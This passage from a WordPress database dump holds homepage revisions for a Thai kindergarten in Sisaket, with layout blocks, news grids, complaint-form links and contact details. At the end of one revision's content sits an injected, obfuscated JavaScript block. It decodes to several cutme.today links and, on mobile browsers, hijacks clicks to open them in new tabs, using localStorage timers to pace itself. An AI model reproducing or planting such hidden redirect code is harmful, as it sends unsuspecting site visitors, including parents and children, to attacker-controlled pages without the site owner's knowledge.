data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:43:23','2025-07-15 09:43:23','',19,'http://watprato.ssk.in.th/?p=722',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(723,1,'2025-07-15 16:44:05','2025-07-15 09:44:05','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container 